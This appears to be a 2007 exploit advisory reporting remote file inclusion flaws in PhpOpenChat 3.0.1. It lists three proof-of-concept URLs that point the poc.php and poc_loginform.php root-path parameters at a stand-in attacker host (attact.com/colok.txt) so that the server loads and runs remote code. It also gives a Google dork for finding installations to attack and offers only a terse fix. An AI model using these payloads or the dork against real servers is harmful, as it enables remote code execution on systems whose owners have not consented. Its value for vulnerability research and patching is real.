-------------------------------------------------- PhpOpenChat <= 3.0.1 (poc.php) Multiple Remote File Include Vulnerabilities -------------------------------------------------- Author : SekoMirza Date Found : Nisan 11 2007 Location : Fransa // ... Critical Lvl : Highly critical Impact : System access Where : From Remote -------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~ Application : PhpOpenChat version : 3.0.1 vendor : http://phpopenchat.org/ source url : http://phpopenchat.org/tr.tar.gz?PHPSESSID=3f694b033a2798aac446b05f87e361ce -------------------------------------------------- Description: ~~~~~~~~ PHPOpenChat is a high performance php-based chat server software for a live chat-room or -module on every php-based site. The first version has been developed for a live-chat-subproject of the main german education portal (DBS) called "SchulWeb". The PHPOpenChat have had to manage alot of users, around 100-150 concurrent chatters, the most behind firewalls and in front of old computers. Based on this experiences, we developed the version 3 of our free chat-server completely new from scratch. At this time you can integrate this chat software into postnuke, phpbb, yabbse, etc. as a module. -------------------------------------------------- Vulnerability: ~~~~~~~~~~~ I found vulnerability script in poc.php Proof Of Concept: ~~~~~~~~~~~~ contrib/phpbb/poc.php?phpbb_root_path=http://attact.com/colok.txt? contrib/phpbb/poc.php?poc_root_path=http://attact.com/colok.txt? contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://attact.com/colok.txt? -------------------------------------------------- google d0rk: ~~~~~~~ "PhpOpenChat" -------------------------------------------------- Solution: ~~~ - download new version in vendor URL -------------------------------------------------- Shoutz: ~~ ~ My Sweet -> Caramel ~ For Mp3s -> Hypn0sis ~ For Support -> www.starhack.org ~ My Bro -> PhantomOrchid ~ My Preceptor -> Erank Kazno